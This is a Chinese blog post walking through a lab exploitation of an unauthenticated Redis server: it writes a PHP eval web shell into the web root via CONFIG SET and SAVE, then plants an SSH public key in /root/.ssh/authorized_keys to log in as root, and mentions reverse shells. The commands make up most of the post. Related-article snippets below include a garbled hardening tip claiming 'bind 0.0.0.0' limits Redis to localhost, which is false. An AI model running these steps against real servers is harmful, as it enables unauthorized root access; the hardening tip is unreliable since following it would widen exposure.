redis未授权访问

最新推荐文章于 2024-02-26 19:40:54 发布
最新推荐文章于 2024-02-26 19:40:54 发布
阅读量209 收藏
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/giaogiao123/article/details/119058126
版权

1.种🐎尝试连接

Redis默认端口号:

6379:默认配置端口号

26379:sentinel.conf配置器端口

攻击机:cente os 7 ip 192.168.30.101
靶机kali 2020.3 ip 192.168.30.100
因为cente os上面装的redis 6.0版本没有历史漏洞,所以我们从这个kali当靶机进行渗透,原理都一样。
进入redis-6.0.6目录下

redis-server  /etc/redis.conf

启动服务
启动服务
同理kali也启动服务
在这里插入图片描述
之后在cente os上开启

./redis-cli -h 192.168.30.100`

进入服务
首先我们是低权限的,最好想到的就是能种🐎

set shell "\n\n<?php @eval($_POST['xigua']);?>\n\n"
config set dir /var/www/html/
config set dbfilename shell.php
save

当然你得确保他的apache服务开启。
种好以后在kali目录下出现🐎
在这里插入图片描述尝试cat命令查看木马
在这里插入图片描述
没有问题,我们开始
尝试蚁剑连接,注意如果是自己的虚拟机进行实验,要加上http://ip/shell.php
否则连不上
在这里插入图片描述成功连接,但是没什么用,因为是低权限,我们无法进行添加删除操作
在这里插入图片描述
但是可以在其他用户下进行操作,无法对root用户进行操作。
换个方向试一试

2通过ssh进行登陆获取权限

首先在cente os下进行如下命令

ssh-keygen -t rsa

在这里插入图片描述在这里插入图片描述
然后进入cd .ssh/目录
进行如下操作

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt
cat 1.txt | redis-cli -h 192.168.30.100 -x set crack

之后打开redis服务

redis-cli -h 192.168.30.100

设置当面目录到.ssh

CONFIG GET dir
config set dir /root/.ssh

进行如下命令

CONFIG SET dbfilename authorized_keys
CONFIG GET dbfilename
save
exit

在这里插入图片描述最后进行登陆

ssh -i id_rsa root@192.168.30.100

在这里插入图片描述成功登陆ssh.
但是需要先在目标靶机下创造mkdir /root/.ssh文件,所以要想办法去创造文件夹
我们也可以通过反弹shell的手法先获得一个shell以便创造文件夹

jing!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Redis授权访问
weixin_63960760的博客
08-29 1019
redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。
Redis 授权访问
qq_61553520的博客
05-17 405
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问等,Redis服务将会暴露到公网上,以及在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下进行授权访问Redis
Redis授权访问漏洞详解(全面)
最新发布
m0_64481831的博客
02-26 2132
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
redis 授权访问拿shell
blackguest07的博客
03-18 908
redis授权访问拿shell
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
Redis授权访问配合SSH key文件利用详解
01-19
Redis 授权访问的问题是一直存在的问题,知道创宇安全研究团队历史上也做过相关的应急,今日,又出现 Redis 授权访问配合 SSH key 文件被利用的情况,导致一大批 Redis 服务器被黑,今天我们来简要的分析下。...
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)POC
09-29
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)exploit Celery 版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在授权访问问题...
redis授权getshell四种方式
BING
04-24 4027
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上,然后在从机上加载so文件,我们就可以执行拓展的新命令了。
redis授权访问漏洞(三种方法)
网安小白的博客
08-30 4926
redis授权访问复现,含写入webshell、linux计划任务反弹shell、写入ssh公钥实现ssh登录三种方法~
漏洞复现】redis授权访问
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-16 851
Redis服务在一台服务器上可以同时启动多个Redis进程,Redis的实际处理速度则是完全依靠于主进程的执行效率。若在服务器.上只运行一个Redis进程, 当多个客户端同时访问时,服务器的处理能力是会有一-定程度的下降;即:在实际生产环境中,需要根据实际的需求来决定开启多少个Redis进程。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。....
redis授权访问漏洞
热门推荐
jiji_king的博客
07-07 1万+
个人笔记
Redis授权访问漏洞
m0_57379855的博客
03-07 971
Redis授权访问漏洞Redis常用的数据类型Redis安装下载Redis解压压缩包安装 gcc 依赖编译安装修改配置文件使用指定配置文件启动 Redis进入客户端停止 redis(在客户端中)配置别名的步骤Redis常见用途keys *flushallsetgethset hashhget hashRedis服务端配置Redis客户端配置Redis持久机制Redis动态修改配置webshell提权反弹连接netcatmsfsocatRedis写入反弹链接crontabSSH key免密登录Redis加固
Redis的sentinel无法连接Cannot connect to a Redis Sentinel
孤夜的博客
09-27 5212
在使用redis的sentinel出现无法连接的异常,将timeout移除就可以了。
Redis授权访问的三种利用方式
鸣蜩十四的博客
12-01 8055
简介 Redis是一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值存储数据库,并提供多种语言的API。 漏洞描述 Redis默认情况下会绑定在0.0.0.0:6379,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。攻击者在授权访问Redis的情况下可以利用Redis的相关方法,可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys文件中,进而可以直接登录目标服务
redis授权访问漏洞修复
11-03
修复Redis授权访问漏洞,可以采取以下措施: ``` 代码块1: 1. 修改redis.conf配置文件,将bind 127.0.0.1改为bind 0.0.0.0,这样Redis只会监听本机的IP地址,而不是所有的IP地址。 2. 设置Redis密码,可以在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值